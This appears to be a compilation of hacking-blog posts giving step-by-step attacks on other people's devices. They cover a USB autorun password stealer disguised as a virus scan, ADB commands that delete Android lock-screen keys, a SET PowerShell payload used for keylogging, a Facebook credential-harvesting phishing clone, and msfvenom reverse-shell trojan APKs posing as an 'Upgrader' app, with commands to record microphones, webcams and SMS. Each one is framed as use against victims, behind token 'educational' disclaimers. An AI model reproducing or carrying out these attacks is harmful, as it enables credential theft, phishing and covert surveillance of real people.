Hack Passwords Using Pendrive (USB Stealer) (NEW)

We all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to steal passwords from any computer. You need to follow these steps to make your own password stealing rootkits.

You must temporarily disable the antivirus before following these steps.

1.    Download the set of tools, extract them and copy all files (.exe) into your USB Pendrive.

Download Password Stealer From Here : Click Here (Google Drive)

2.    Create a new Notepad and write the following text into it.

[autorun] open=launch.bat
ACTION= Perform a Virus Scan

3.    Save the Notepad and rename it from New Text Document.txt to autorun.inf

4.    Copy the autorun.inf file onto your USB pen-drive.

5.    Create another Notepad and write the following text in it.

start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.

Now our rootkit is ready and we are all set to sniff the passwords. You can use this pen-drive on on any computer to steal the stored passwords.

Now, Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive). In the pop-up window, select the first option (Perform a Virus Scan).  Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. Remove the pen-drive and you’ll see the stored passwords in the .TXT files and Use The Passwords..

This Post Is Only For Educational Purpose... Please Do Not Misuse..

if you like our posts please like & share with your friends... 

& Don't Forget To....

Like Our Facebook Page : www.facebook.com/thehackingsage 

Join Our Facebook Group : www.facebook.com/groups/thehackingsage

Follow Us at Twitter : www.twitter.com/thehackingsage

Follow Us at Instagram : www.instagram.com/thehackingsage

Subscribe Our You Tube Channel : www.youtube.com/channel/UCtwxOwWOgn54e7iseUfFF4g

Keep Visiting... Enjoy !!! :)

5 Ways to Bypass Android LockScreen.

Android is one of the most popular operating system for android phone. If you want smartphone but android phone. Android phone comes with many features and securities. You can lock your device from pattern and pin. This is one of the most easy way to lock your android smartphone , without your permission no one can use your android smartphone. 

But many times we forget own lock or pattern in android smartphone. In this post we tell you how you can unlock/bypass your android smartphone without typing pin and enter pattern in android phone. There are many ways for bypass android pattern lock in your android phone.

5 Ways to Unlock Android Lock Screen :

1. Bypass Android Pattern Lock from ADB
2. Bypass Android Pattern Lock from Factory Reset
3. Bypass Android Pattern Lock from Sending SMS
4. Unlock Android Pattern Lock Screen from Google
5. Unlock Android Pattern Lock Screen using Kali-Linux

Now Below we give you brief description how you unlock your android pattern. Make sure your phone is fully charged when trying to bypass android pattern lockscreen.

1. Bypass Android Pattern Lock from ADB Tool :

You can bypass or disable your android pattern lock from usinh ADB (Android Debugging Bridge) Tool. You can download this tools from its official website. ADB tools work with your Window PC Linux, You can easily bypass android lockscreen from ADB Tools.

Download ADB Tools with Drivers for Window 7, Window 8.1 and Window 10. 

Make Sure USB Debugging is enabled in your android phone. If your Mobile USB Debugging is not enabled in your android phone, you can;t use this method.

• Download and Install ADB Drivers in your Window PC.
• Connect Your Android Phone with your Window PC.
• Open Command Prompt , type adb devices and press enter.
• Now you see your Device Name with its model number.
• Type one by one these commands in your Command Prompt Screen 

• adb shell 
• su 
• rm /data/system/gesture.key

• Now enter any pattern in your android phone and you can easily bypass android pattern lockscreen from using adb in your window pc.

2. Bypass Android Pattern Lock from Factory Reset :

This is one of the most easy way for removing or disable android pattern lockscreen in android smartphone. But In this method you lost your all contacts and android data. Make sure you try above method , If you lost all above then try this method in your android phone for bypass android pattern lockscreen in android smartphone.

• Switch Off your android phone and start it.
• Press Volume Down + Power Button when you power on your android device. (Or You can search for internet , how you can open android recovery mode in your android device. This combination works different in every android mobiles.)
• Now press volume up and down button and delete all user data in your android smartphone.

• Bypass Android Pattern LockScreen from Factory Reset - Android Recovery Mode
• This is one of the best way for bypass android pattern lock without using adb and cmd.

3. Bypass Android Pattern from Sending SMS :

When you buy new android phone for your daily use. Download SMS Bypass LockScreen Android App for your android phone. If somehow you forget your android pattern lock/pin/password , you can easily recover it throught sending sms from another android phone.

4. Unlock Android Pattern Lockscreen from Google (Default Method) :

This is default method and working in every android smartphone , but make sure your phone is connected with wifi or mobile data network. When you enter too many wrong pattern lock in your android phone , your phone will be locked and give you options for recovering your pattern lock from forget password options.

Select your Google Account and type your gmail password and google account password. If you type right password in your android smartphone , your phone will be unlocked. But this method is not working in your android phone, because people off data connection and they did not enable auto connect wifi in android settings.

If you buy new phone make sure you always enable data connection for bypass android pattern , if your forget password.

5. Unlock Android Pattern Lockscreen using Kali Linux :

Requirements : Kali Linux, An Android Phone, USB Cable, ADB Android Tool
First Boot your Kali Linux Distribution. now Connect your phone to your PC using USB cable then Open up Terminal For Installing ADB over terminal and Boot into any Linux distro you have. Now On your Terminal type :   #sudo apt-get install android-tools-adb  This will install ADB Android Tool on your Kali Linux Machine. now its time to Disabling pattern unlock over terminal.. so now Open up terminal again and type this : 

#adb devices
#adb shell
#cd data/system
#su
#rm *.key

Almost Done.!!! Now,disconnect your phone and reboot. Unlock pattern should be here. Just try some random gesture and it will get unlocked.. That's It..

These are one of the best way for bypass android pattern lock in any android smartphone. Make sure you use these tricks for only educational purposes...

IF YOU LIKE THIS TUTORIAL PLEASE LIKE & SHARE THIS WITH YOUR FRIENDS !!!! 

FOR ANY QUERIES COMMENT BELOW..

ENJOY !!! :)

Hack Any PC Using Kali-Linux.

Isn't it cool that you can control other's pc from your pc!!! Yes you can do it very easily. All you need is Kali linux in your PC..

In this tutorial you will learn HOW TO HACK ANY PC USING KALI LINUX. 

We are going to use SOCIAL ENGINEERING TOOLKIT for the hacking purpose. You may be curious about What the hell is social engineering toolkit? Let's first start with what is SET?

SOCIAL ENGINEERING TOOLKIT

SET is basically an open source python driven tool aimed at penetration testing around social engineering. It was created by the founder of TrustedSec. It is a menu driven based attack system, which makes the use of hacker tools easy. It is not made with command line interface because the social engineering attacks requires lot of customization according to the scenarios. Let's dive into the SET menu.

   1) Spear-Phishing Attack Vectors

   2) Website Attack Vectors

   3) Infectious Media Generator

   4) Create a Payload and Listener

   5) Mass Mailer Attack

   6) Arduino-Based Attack Vector

   7) SMS Spoofing Attack Vector

   8) Wireless Access Point Attack Vector

   9) QRCode Generator Attack Vector

  10) Powershell Attack Vectors

  11) Third Party Modules

  99) Return back to the main menu  

It has got 12 options . And each option has got sub- divisions . We will not makes our hands dirty in all this .We will mainly focus on our main aim i.e hack any pc

So let's get started !!!!

Follow These Simple Steps :

1. Fire up Kali linux 2.0 / Kali linux 1.0 

2. Go to Applications>Exploitation Tools>Social Engineering Toolkit.

3. Select 1(Social Engineering Attacks) ==> 9(Powershell Attack Vectors ) ==> 1(Powershell Alphanumeric Shellcode Injectors).

4. Open a new terminal and type ifconfig .Copy and paste the ip address after LHOST : 192.XXX.X.XX and enter PORT:443

5. Do you want to start the listner now [yes/no] : yes . Copy the path as shown

6. Open a new terminal and Type the commands as shown

7. The file named as x86 powershellinjection.txt will be saved on your kali linux desktop rename it as "YOURNAME.bat ". Transfer it using pen drive or any cloud drive to victims pc.

8. When the victim press the .bat file on his pc , the payload handler will start .

9. msf exploit (handler) > sessions -i 1

    meterpreter>sysinfo

    meterpreter>keyscan_start (whatever the victim will type the keys will be recorded)

    meterpreter>keyscan_dump

     meterpreter>help (To get hacking/exploit commands list)

NOTE: This hacking only works when both the pc(your pc and victim's pc) is connected on the same network(LAN/WiFi). And we don't take any responsibility in case of breaking any legal laws. This tutorial is for educational purpose only.

If you like this tutorial please LIKE & SHARE this with your friends !!!! 

For any queries comment below..

Enjoy !!! :)

Hack A Facebook Account Using Kali-Linux (Credential Harvester Attack)

in our previews post we teach you how you can hack facebook password with one fake fb page (phishing). (Create A Facebook Phishing Page : CLICK HERE)

In this tutorial we will use Social Engineering tool i.e Credential Harvester Attack in kali linux.

All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.

WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

LET'S DO THIS !!!!!!!!!

STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.

                    

root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

'1' (Social Engineering Attacks) then  

'2' (Website Attack Vectors) then

'3' (Credential Harvester Attack) then

5. Type '2' (Site Cloner)

set:webattack> IP address for the post back in 

harvesting:192.168.x.xxx (your ip address)

set:webattack>Enter the url to clone: www.facebook.com

6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Done !!!

if you face any problem please Comment down below..

& if you like this post please LIKE & SHARE this with your friends... :)

Enjoy HACKiNG !!! :)

Hack Any Android Phone Using Kali. (Method 2)

Msfvenom Is A Kali Linux Hacking Tool For Android ,Is A Combination Of Msfpayload And Msfencode, Putting Both Of These Tools Into A Single Framework Instance Known As Msfvenom Payload.

Hacking With METASPLOIT In Kali Linux Is A Old Tool. Metasploit Is Enhanced By Msfvenom In Kali Linux. Metasploit Is Now A Outdated Tool.

So, let's get started... !!!

Follow These Simple Steps :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.

Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
         
Command :

root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

************************************************************************

Error fixing (incase you get PARSE ERROR)

Parse error : To fix this error download signapk - Click here to download

Steps To follow :

• Open Signapk folder then open cmd.
• Copy the andro.apk(the app you made) in Signapk folder.
• Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
• copy it in your phone and install it.

Hope this works... :)

Share the post with your friends...

Enjoy HACKiNG !!! :)

Hack Any Android Phone Using Kali. (Method 1)

This is a tutorial explaining how to hack android phones with Kali.

I can't see any tutorials explaining this Hack/Exploit, so, I made one.

Step 1 :

• Open a terminal, and make a Trojan.apk
• You can do this by typing :
• msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
• You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2 :

• Open another terminal until the file is being produced.
• Load metasploit console, by typing : msfconsole

Step 3 :

• After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler

• Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
• To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4 :

• At last type: exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.

• Then send it using Uploading it to Dropbox or any sharing website                          (Like : www.speedyshare.com).
• Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

• Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
• However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
• And when he clicks Open...

Step 5 :

There comes the meterpreter prompt :

Done !!!

NOTE : Some post modules that work for windows might not work in android

For Eg: run killav, persistence (persistent backdoor) etc..

Enjoy HACKiNG !!! :)